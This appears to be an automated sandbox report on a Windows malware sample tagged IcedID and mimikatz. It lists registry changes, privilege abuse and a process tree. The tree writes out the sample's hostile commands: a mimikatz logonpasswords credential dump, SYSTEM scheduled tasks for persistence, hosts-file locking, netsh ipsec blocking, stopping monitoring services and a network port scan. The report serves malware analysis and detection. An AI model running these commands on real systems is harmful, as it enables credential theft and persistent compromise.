\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tyttue.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2124 cmd.exe 4748 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000a000000023b7b-6.dat nsis_installer_2 behavioral2/files/0x000a000000023b88-15.dat nsis_installer_1 behavioral2/files/0x000a000000023b88-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing jirnzjt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ jirnzjt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" jirnzjt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" jirnzjt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" jirnzjt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" jirnzjt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vrlgkrtsk.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vrlgkrtsk.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" jirnzjt.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" jirnzjt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" jirnzjt.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4748 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1884 schtasks.exe 2508 schtasks.exe 732 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2372 2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2372 2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 872 jirnzjt.exe Token: SeDebugPrivilege 3884 jirnzjt.exe Token: SeDebugPrivilege 2612 vfshost.exe Token: SeDebugPrivilege 3924 vrlgkrtsk.exe Token: SeLockMemoryPrivilege 4656 jngiyk.exe Token: SeLockMemoryPrivilege 4656 jngiyk.exe Token: SeDebugPrivilege 1432 vrlgkrtsk.exe Token: SeDebugPrivilege 3964 vrlgkrtsk.exe Token: SeDebugPrivilege 1232 vrlgkrtsk.exe Token: SeDebugPrivilege 3300 vrlgkrtsk.exe Token: SeDebugPrivilege 2004 vrlgkrtsk.exe Token: SeDebugPrivilege 4248 vrlgkrtsk.exe Token: SeDebugPrivilege 5080 vrlgkrtsk.exe Token: SeDebugPrivilege 1964 vrlgkrtsk.exe Token: SeDebugPrivilege 3108 vrlgkrtsk.exe Token: SeDebugPrivilege 2228 vrlgkrtsk.exe Token: SeDebugPrivilege 2556 vrlgkrtsk.exe Token: SeDebugPrivilege 2968 vrlgkrtsk.exe Token: SeDebugPrivilege 3236 vrlgkrtsk.exe Token: SeDebugPrivilege 1520 vrlgkrtsk.exe Token: SeDebugPrivilege 4832 vrlgkrtsk.exe Token: SeDebugPrivilege 3536 vrlgkrtsk.exe Token: SeDebugPrivilege 4248 vrlgkrtsk.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2372 2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe 2372 2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe 872 jirnzjt.exe 872 jirnzjt.exe 3884 jirnzjt.exe 3884 jirnzjt.exe 3252 xohudmc.exe 3668 tyttue.exe 3020 jirnzjt.exe 3020 jirnzjt.exe 2808 jirnzjt.exe 2808 jirnzjt.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2372 wrote to memory of 2124 2372 2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe 85 PID 2372 wrote to memory of 2124 2372 2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe 85 PID 2372 wrote to memory of 2124 2372 2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe 85 PID 2124 wrote to memory of 4748 2124 cmd.exe 87 PID 2124 wrote to memory of 4748 2124 cmd.exe 87 PID 2124 wrote to memory of 4748 2124 cmd.exe 87 PID 2124 wrote to memory of 872 2124 cmd.exe 88 PID 2124 wrote to memory of 872 2124 cmd.exe 88 PID 2124 wrote to memory of 872 2124 cmd.exe 88 PID 3884 wrote to memory of 2316 3884 jirnzjt.exe 90 PID 3884 wrote to memory of 2316 3884 jirnzjt.exe 90 PID 3884 wrote to memory of 2316 3884 jirnzjt.exe 90 PID 2316 wrote to memory of 4476 2316 cmd.exe 92 PID 2316 wrote to memory of 4476 2316 cmd.exe 92 PID 2316 wrote to memory of 4476 2316 cmd.exe 92 PID 2316 wrote to memory of 4664 2316 cmd.exe 93 PID 2316 wrote to memory of 4664 2316 cmd.exe 93 PID 2316 wrote to memory of 4664 2316 cmd.exe 93 PID 2316 wrote to memory of 2924 2316 cmd.exe 94 PID 2316 wrote to memory of 2924 2316 cmd.exe 94 PID 2316 wrote to memory of 2924 2316 cmd.exe 94 PID 2316 wrote to memory of 2324 2316 cmd.exe 95 PID 2316 wrote to memory of 2324 2316 cmd.exe 95 PID 2316 wrote to memory of 2324 2316 cmd.exe 95 PID 2316 wrote to memory of 3460 2316 cmd.exe 96 PID 2316 wrote to memory of 3460 2316 cmd.exe 96 PID 2316 wrote to memory of 3460 2316 cmd.exe 96 PID 2316 wrote to memory of 2180 2316 cmd.exe 97 PID 2316 wrote to memory of 2180 2316 cmd.exe 97 PID 2316 wrote to memory of 2180 2316 cmd.exe 97 PID 3884 wrote to memory of 4804 3884 jirnzjt.exe 99 PID 3884 wrote to memory of 4804 3884 jirnzjt.exe 99 PID 3884 wrote to memory of 4804 3884 jirnzjt.exe 99 PID 3884 wrote to memory of 4896 3884 jirnzjt.exe 101 PID 3884 wrote to memory of 4896 3884 jirnzjt.exe 101 PID 3884 wrote to memory of 4896 3884 jirnzjt.exe 101 PID 3884 wrote to memory of 2632 3884 jirnzjt.exe 103 PID 3884 wrote to memory of 2632 3884 jirnzjt.exe 103 PID 3884 wrote to memory of 2632 3884 jirnzjt.exe 103 PID 3884 wrote to memory of 4912 3884 jirnzjt.exe 117 PID 3884 wrote to memory of 4912 3884 jirnzjt.exe 117 PID 3884 wrote to memory of 4912 3884 jirnzjt.exe 117 PID 4912 wrote to memory of 1432 4912 cmd.exe 119 PID 4912 wrote to memory of 1432 4912 cmd.exe 119 PID 4912 wrote to memory of 1432 4912 cmd.exe 119 PID 1432 wrote to memory of 2468 1432 wpcap.exe 120 PID 1432 wrote to memory of 2468 1432 wpcap.exe 120 PID 1432 wrote to memory of 2468 1432 wpcap.exe 120 PID 2468 wrote to memory of 4576 2468 net.exe 122 PID 2468 wrote to memory of 4576 2468 net.exe 122 PID 2468 wrote to memory of 4576 2468 net.exe 122 PID 1432 wrote to memory of 1628 1432 wpcap.exe 123 PID 1432 wrote to memory of 1628 1432 wpcap.exe 123 PID 1432 wrote to memory of 1628 1432 wpcap.exe 123 PID 1628 wrote to memory of 4480 1628 net.exe 125 PID 1628 wrote to memory of 4480 1628 net.exe 125 PID 1628 wrote to memory of 4480 1628 net.exe 125 PID 1432 wrote to memory of 2236 1432 wpcap.exe 126 PID 1432 wrote to memory of 2236 1432 wpcap.exe 126 PID 1432 wrote to memory of 2236 1432 wpcap.exe 126 PID 2236 wrote to memory of 2028 2236 net.exe 128 PID 2236 wrote to memory of 2028 2236 net.exe 128 PID 2236 wrote to memory of 2028 2236 net.exe 128 PID 1432 wrote to memory of 4656 1432 wpcap.exe 129
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1708
-
C:\Windows\TEMP\ibnltisvu\jngiyk.exe"C:\Windows\TEMP\ibnltisvu\jngiyk.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4656
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-06_0dadce60328353ce4f127adcf963836a_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\mgifenbt\jirnzjt.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4748
-
-
C:\Windows\mgifenbt\jirnzjt.exeC:\Windows\mgifenbt\jirnzjt.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:872
-
-
-
C:\Windows\mgifenbt\jirnzjt.exeC:\Windows\mgifenbt\jirnzjt.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4476
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2924
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3460
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2180
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4804
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4896
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2632
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\etqajulug\ekithtuut\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4912 -
C:\Windows\etqajulug\ekithtuut\wpcap.exeC:\Windows\etqajulug\ekithtuut\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4576
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:4480
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:2028
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:4656
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:3308
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1672
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3852
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3460
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2636 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2148 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3708
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\etqajulug\ekithtuut\llefvytvt.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\etqajulug\ekithtuut\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:3508 -
C:\Windows\etqajulug\ekithtuut\llefvytvt.exeC:\Windows\etqajulug\ekithtuut\llefvytvt.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\etqajulug\ekithtuut\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4484
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\etqajulug\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\etqajulug\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2032 -
C:\Windows\etqajulug\Corporate\vfshost.exeC:\Windows\etqajulug\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mgifbllvi" /ru system /tr "cmd /c C:\Windows\ime\jirnzjt.exe"2⤵
- System Location Discovery: System Language Discovery
PID:684 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2348
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "mgifbllvi" /ru system /tr "cmd /c C:\Windows\ime\jirnzjt.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:732
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "entieatkh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mgifenbt\jirnzjt.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:2044 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "entieatkh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mgifenbt\jirnzjt.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1884
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ilklngwgl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ibnltisvu\jngiyk.exe /p everyone:F"2⤵PID:3340
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1980
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ilklngwgl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ibnltisvu\jngiyk.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2508
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4504
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3256
-
-
